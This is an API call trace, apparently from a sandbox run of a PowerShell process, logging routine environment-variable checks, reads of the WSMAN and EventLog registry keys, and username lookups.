	[0756.041] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0756.041] CoTaskMemFree (pv=0x1b93b8b0) 
	[0756.043] CoTaskMemAlloc (cb=0x104) returned 0x1b93b8b0
	[0756.043] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0756.043] CoTaskMemFree (pv=0x1b93b8b0) 
	[0756.047] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d418 | out: phkResult=0x18d418*=0x30c) returned 0x0
	[0756.048] RegQueryInfoKeyW (in: hKey=0x30c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18d31c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x18d318, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18d31c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x18d318*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0756.048] CoTaskMemFree (pv=0x0) 
	[0756.048] CoTaskMemAlloc (cb=0x204) returned 0x239c20
	[0756.048] RegEnumValueW (in: hKey=0x30c, dwIndex=0x0, lpValueName=0x239c20, lpcchValueName=0x18d3c8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x18d3c8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0756.049] CoTaskMemFree (pv=0x239c20) 
	[0756.049] CoTaskMemAlloc (cb=0x204) returned 0x239c20
	[0756.049] RegEnumValueW (in: hKey=0x30c, dwIndex=0x1, lpValueName=0x239c20, lpcchValueName=0x18d3c8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x18d3c8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0756.049] CoTaskMemFree (pv=0x239c20) 
	[0756.049] CoTaskMemAlloc (cb=0x204) returned 0x239c20
	[0756.049] RegEnumValueW (in: hKey=0x30c, dwIndex=0x2, lpValueName=0x239c20, lpcchValueName=0x18d3c8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x18d3c8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0756.049] CoTaskMemFree (pv=0x239c20) 
	[0756.049] RegQueryValueExW (in: hKey=0x30c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x18d3ac, lpData=0x0, lpcbData=0x18d3a8*=0x0 | out: lpType=0x18d3ac*=0x1, lpData=0x0, lpcbData=0x18d3a8*=0x8) returned 0x0
	[0756.049] CoTaskMemAlloc (cb=0xc) returned 0x2b3250
	[0756.050] RegQueryValueExW (in: hKey=0x30c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x18d37c, lpData=0x2b3250, lpcbData=0x18d378*=0x8 | out: lpType=0x18d37c*=0x1, lpData="2.0", lpcbData=0x18d378*=0x8) returned 0x0
	[0756.050] CoTaskMemFree (pv=0x2b3250) 
	[0757.492] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d368 | out: phkResult=0x18d368*=0x324) returned 0x0
	[0757.492] RegQueryInfoKeyW (in: hKey=0x324, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18d26c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x18d268, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18d26c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x18d268*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0757.492] CoTaskMemFree (pv=0x0) 
	[0757.492] CoTaskMemAlloc (cb=0x204) returned 0x239c20
	[0757.492] RegEnumValueW (in: hKey=0x324, dwIndex=0x0, lpValueName=0x239c20, lpcchValueName=0x18d318, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x18d318, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0757.493] CoTaskMemFree (pv=0x239c20) 
	[0757.493] CoTaskMemAlloc (cb=0x204) returned 0x239c20
	[0757.493] RegEnumValueW (in: hKey=0x324, dwIndex=0x1, lpValueName=0x239c20, lpcchValueName=0x18d318, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x18d318, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0757.493] CoTaskMemFree (pv=0x239c20) 
	[0757.493] CoTaskMemAlloc (cb=0x204) returned 0x239c20
	[0757.493] RegEnumValueW (in: hKey=0x324, dwIndex=0x2, lpValueName=0x239c20, lpcchValueName=0x18d318, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x18d318, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0757.493] CoTaskMemFree (pv=0x239c20) 
	[0757.493] RegQueryValueExW (in: hKey=0x324, lpValueName="StackVersion", lpReserved=0x0, lpType=0x18d2fc, lpData=0x0, lpcbData=0x18d2f8*=0x0 | out: lpType=0x18d2fc*=0x1, lpData=0x0, lpcbData=0x18d2f8*=0x8) returned 0x0
	[0757.493] CoTaskMemAlloc (cb=0xc) returned 0x2b31b0
	[0757.493] RegQueryValueExW (in: hKey=0x324, lpValueName="StackVersion", lpReserved=0x0, lpType=0x18d2cc, lpData=0x2b31b0, lpcbData=0x18d2c8*=0x8 | out: lpType=0x18d2cc*=0x1, lpData="2.0", lpcbData=0x18d2c8*=0x8) returned 0x0
	[0757.493] CoTaskMemFree (pv=0x2b31b0) 
	[0757.495] CoTaskMemAlloc (cb=0x104) returned 0x1b93b8b0
	[0757.495] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0757.495] CoTaskMemFree (pv=0x1b93b8b0) 
	[0757.505] CoTaskMemAlloc (cb=0x104) returned 0x1b93b8b0
	[0757.505] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0757.506] CoTaskMemFree (pv=0x1b93b8b0) 
	[0758.731] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d398 | out: phkResult=0x18d398*=0x328) returned 0x0
	[0758.738] RegQueryInfoKeyW (in: hKey=0x328, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18d30c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x18d308, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18d30c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x18d308*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0758.739] CoTaskMemFree (pv=0x0) 
	[0758.740] CoTaskMemAlloc (cb=0x204) returned 0x239c20
	[0758.740] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x0, lpName=0x239c20, lpcchName=0x18d398, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x18d398, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0758.740] CoTaskMemFree (pv=0x239c20) 
	[0758.740] CoTaskMemFree (pv=0x0) 
	[0758.740] CoTaskMemAlloc (cb=0x204) returned 0x239c20
	[0758.740] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x1, lpName=0x239c20, lpcchName=0x18d398, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x18d398, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0758.740] CoTaskMemFree (pv=0x239c20) 
	[0758.740] CoTaskMemFree (pv=0x0) 
	[0758.740] CoTaskMemAlloc (cb=0x204) returned 0x239c20
	[0758.740] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x2, lpName=0x239c20, lpcchName=0x18d398, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x18d398, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0758.740] CoTaskMemFree (pv=0x239c20) 
	[0758.740] CoTaskMemFree (pv=0x0) 
	[0758.740] CoTaskMemAlloc (cb=0x204) returned 0x239c20
	[0758.740] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x3, lpName=0x239c20, lpcchName=0x18d398, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x18d398, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0758.740] CoTaskMemFree (pv=0x239c20) 
	[0758.740] CoTaskMemFree (pv=0x0) 
	[0758.741] CoTaskMemAlloc (cb=0x204) returned 0x239c20
	[0758.741] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x4, lpName=0x239c20, lpcchName=0x18d398, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x18d398, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0758.741] CoTaskMemFree (pv=0x239c20) 
	[0758.741] CoTaskMemFree (pv=0x0) 
	[0758.741] CoTaskMemAlloc (cb=0x204) returned 0x239c20
	[0758.741] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x5, lpName=0x239c20, lpcchName=0x18d398, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x18d398, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0758.741] CoTaskMemFree (pv=0x239c20) 
	[0758.741] CoTaskMemFree (pv=0x0) 
	[0758.741] CoTaskMemAlloc (cb=0x204) returned 0x239c20
	[0758.741] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x6, lpName=0x239c20, lpcchName=0x18d398, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x18d398, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0758.741] CoTaskMemFree (pv=0x239c20) 
	[0758.741] CoTaskMemFree (pv=0x0) 
	[0758.741] CoTaskMemAlloc (cb=0x204) returned 0x239c20
	[0758.741] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x7, lpName=0x239c20, lpcchName=0x18d398, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x18d398, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0758.741] CoTaskMemFree (pv=0x239c20) 
	[0758.741] CoTaskMemFree (pv=0x0) 
	[0758.741] CoTaskMemAlloc (cb=0x204) returned 0x239c20
	[0758.741] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x8, lpName=0x239c20, lpcchName=0x18d398, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x18d398, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0758.742] CoTaskMemFree (pv=0x239c20) 
	[0758.742] CoTaskMemFree (pv=0x0) 
	[0758.742] RegOpenKeyExW (in: hKey=0x328, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3f8 | out: phkResult=0x18d3f8*=0x32c) returned 0x0
	[0758.742] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3f8 | out: phkResult=0x18d3f8*=0x0) returned 0x2
	[0758.742] RegOpenKeyExW (in: hKey=0x328, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3f8 | out: phkResult=0x18d3f8*=0x330) returned 0x0
	[0758.742] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3f8 | out: phkResult=0x18d3f8*=0x0) returned 0x2
	[0758.742] RegOpenKeyExW (in: hKey=0x328, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3f8 | out: phkResult=0x18d3f8*=0x334) returned 0x0
	[0758.742] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3f8 | out: phkResult=0x18d3f8*=0x0) returned 0x2
	[0758.742] RegOpenKeyExW (in: hKey=0x328, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3f8 | out: phkResult=0x18d3f8*=0x338) returned 0x0
	[0758.742] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3f8 | out: phkResult=0x18d3f8*=0x0) returned 0x2
	[0758.743] RegOpenKeyExW (in: hKey=0x328, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3f8 | out: phkResult=0x18d3f8*=0x33c) returned 0x0
	[0758.743] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3f8 | out: phkResult=0x18d3f8*=0x0) returned 0x2
	[0758.743] RegOpenKeyExW (in: hKey=0x328, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3f8 | out: phkResult=0x18d3f8*=0x340) returned 0x0
	[0758.743] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3f8 | out: phkResult=0x18d3f8*=0x0) returned 0x2
	[0758.743] RegOpenKeyExW (in: hKey=0x328, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3f8 | out: phkResult=0x18d3f8*=0x344) returned 0x0
	[0758.743] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3f8 | out: phkResult=0x18d3f8*=0x0) returned 0x2
	[0758.743] RegOpenKeyExW (in: hKey=0x328, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3f8 | out: phkResult=0x18d3f8*=0x348) returned 0x0
	[0758.743] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3f8 | out: phkResult=0x18d3f8*=0x0) returned 0x2
	[0758.744] RegOpenKeyExW (in: hKey=0x328, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3f8 | out: phkResult=0x18d3f8*=0x34c) returned 0x0
	[0758.744] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3f8 | out: phkResult=0x18d3f8*=0x350) returned 0x0
	[0758.744] RegCloseKey (hKey=0x350) returned 0x0
	[0758.744] RegCloseKey (hKey=0x328) returned 0x0
	[0758.745] RegCloseKey (hKey=0x34c) returned 0x0
	[0758.759] CoTaskMemAlloc (cb=0x804) returned 0x1b965a70
	[0758.760] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b965a70, nSize=0x18d608 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x18d608) returned 0x1
	[0760.249] CoTaskMemFree (pv=0x1b965a70) 
	[0760.250] CoTaskMemAlloc (cb=0x204) returned 0x239c20
	[0760.250] GetUserNameW (in: lpBuffer=0x239c20, pcbBuffer=0x18d648 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x18d648) returned 1
	[0760.251] CoTaskMemFree (pv=0x239c20) 
	[0760.273] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d348 | out: phkResult=0x18d348*=0x354) returned 0x0
	[0760.273] RegQueryInfoKeyW (in: hKey=0x354, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18d2bc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x18d2b8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18d2bc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x18d2b8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0760.273] CoTaskMemFree (pv=0x0) 
	[0760.273] CoTaskMemAlloc (cb=0x204) returned 0x239c20
	[0760.273] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x0, lpName=0x239c20, lpcchName=0x18d348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x18d348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0760.273] CoTaskMemFree (pv=0x239c20) 
	[0760.273] CoTaskMemFree (pv=0x0) 
	[0760.274] CoTaskMemAlloc (cb=0x204) returned 0x239c20
	[0760.274] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x1, lpName=0x239c20, lpcchName=0x18d348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x18d348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0760.274] CoTaskMemFree (pv=0x239c20) 
	[0760.274] CoTaskMemFree (pv=0x0) 
	[0760.274] CoTaskMemAlloc (cb=0x204) returned 0x239c20
	[0760.274] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x2, lpName=0x239c20, lpcchName=0x18d348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x18d348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0760.274] CoTaskMemFree (pv=0x239c20) 
	[0760.274] CoTaskMemFree (pv=0x0) 
	[0760.274] CoTaskMemAlloc (cb=0x204) returned 0x239c20
	[0760.274] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x3, lpName=0x239c20, lpcchName=0x18d348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x18d348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0760.274] CoTaskMemFree (pv=0x239c20) 
	[0760.274] CoTaskMemFree (pv=0x0) 
	[0760.274] CoTaskMemAlloc (cb=0x204) returned 0x239c20
	[0760.274] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x4, lpName=0x239c20, lpcchName=0x18d348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x18d348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0760.275] CoTaskMemFree (pv=0x239c20) 
	[0760.275] CoTaskMemFree (pv=0x0) 
	[0760.275] CoTaskMemAlloc (cb=0x204) returned 0x239c20
	[0760.275] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x5, lpName=0x239c20, lpcchName=0x18d348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x18d348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0760.275] CoTaskMemFree (pv=0x239c20) 
	[0760.275] CoTaskMemFree (pv=0x0) 
	[0760.275] CoTaskMemAlloc (cb=0x204) returned 0x239c20
	[0760.275] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x6, lpName=0x239c20, lpcchName=0x18d348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x18d348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0760.275] CoTaskMemFree (pv=0x239c20) 
	[0760.275] CoTaskMemFree (pv=0x0) 
	[0760.275] CoTaskMemAlloc (cb=0x204) returned 0x239c20
	[0760.275] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x7, lpName=0x239c20, lpcchName=0x18d348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x18d348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0760.275] CoTaskMemFree (pv=0x239c20) 
	[0760.275] CoTaskMemFree (pv=0x0) 
	[0760.275] CoTaskMemAlloc (cb=0x204) returned 0x239c20
	[0760.275] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x8, lpName=0x239c20, lpcchName=0x18d348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x18d348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0760.276] CoTaskMemFree (pv=0x239c20) 
	[0760.276] CoTaskMemFree (pv=0x0) 
	[0760.276] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3a8 | out: phkResult=0x18d3a8*=0x358) returned 0x0
	[0760.276] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3a8 | out: phkResult=0x18d3a8*=0x0) returned 0x2
	[0760.276] RegOpenKeyExW (in: hKey=0x354, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3a8 | out: phkResult=0x18d3a8*=0x35c) returned 0x0
	[0760.276] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3a8 | out: phkResult=0x18d3a8*=0x0) returned 0x2
	[0760.276] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3a8 | out: phkResult=0x18d3a8*=0x360) returned 0x0
	[0760.276] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3a8 | out: phkResult=0x18d3a8*=0x0) returned 0x2
	[0760.276] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3a8 | out: phkResult=0x18d3a8*=0x364) returned 0x0
	[0760.277] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3a8 | out: phkResult=0x18d3a8*=0x0) returned 0x2
	[0760.277] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3a8 | out: phkResult=0x18d3a8*=0x368) returned 0x0
	[0760.277] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3a8 | out: phkResult=0x18d3a8*=0x0) returned 0x2
	[0760.277] RegOpenKeyExW (in: hKey=0x354, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3a8 | out: phkResult=0x18d3a8*=0x36c) returned 0x0
	[0760.277] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3a8 | out: phkResult=0x18d3a8*=0x0) returned 0x2
	[0760.277] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3a8 | out: phkResult=0x18d3a8*=0x370) returned 0x0
	[0760.277] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3a8 | out: phkResult=0x18d3a8*=0x0) returned 0x2
	[0760.277] RegOpenKeyExW (in: hKey=0x354, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3a8 | out: phkResult=0x18d3a8*=0x374) returned 0x0
	[0760.278] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3a8 | out: phkResult=0x18d3a8*=0x0) returned 0x2
	[0760.278] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3a8 | out: phkResult=0x18d3a8*=0x378) returned 0x0
	[0760.278] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d3a8 | out: phkResult=0x18d3a8*=0x37c) returned 0x0
	[0760.278] RegCloseKey (hKey=0x37c) returned 0x0
	[0760.278] RegCloseKey (hKey=0x354) returned 0x0
	[0760.279] RegCloseKey (hKey=0x378) returned 0x0
	[0760.279] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d348 | out: phkResult=0x18d348*=0x378) returned 0x0
	[0760.280] RegQueryInfoKeyW (in: hKey=0x378, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18d2bc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x18d2b8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18d2bc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x18d2b8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0760.280] CoTaskMemFree (pv=0x0) 
	[0760.280] CoTaskMemAlloc (cb=0x204) returned 0x239c20
	[0760.280] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x0, lpName=0x239c20, lpcchName=0x18d348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x18d348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0760.280] CoTaskMemFree (pv=0x239c20) 
	[0760.280] CoTaskMemFree (pv=0x0) 
	[0760.280] CoTaskMemAlloc (cb=0x204) returned 0x239c20
	[0760.280] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x1, lpName=0x239c20, lpcchName=0x18d348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x18d348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0760.280] CoTaskMemFree (pv=0x239c20) 
	[0760.280] CoTaskMemFree (pv=0x0) 
	[0760.283] CoTaskMemAlloc (cb=0x204) returned 0x239c20
	[0760.283] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x2, lpName=0x239c20, lpcchName=0x18d348, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x18d348, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0760.284] CoTaskMemFree (pv=0x239c20) 
	[0760.284] CoTaskMemFree (pv=0x0) 
	[0760.284] CoTaskMemAlloc (cb=0x204) returned 0x239c20
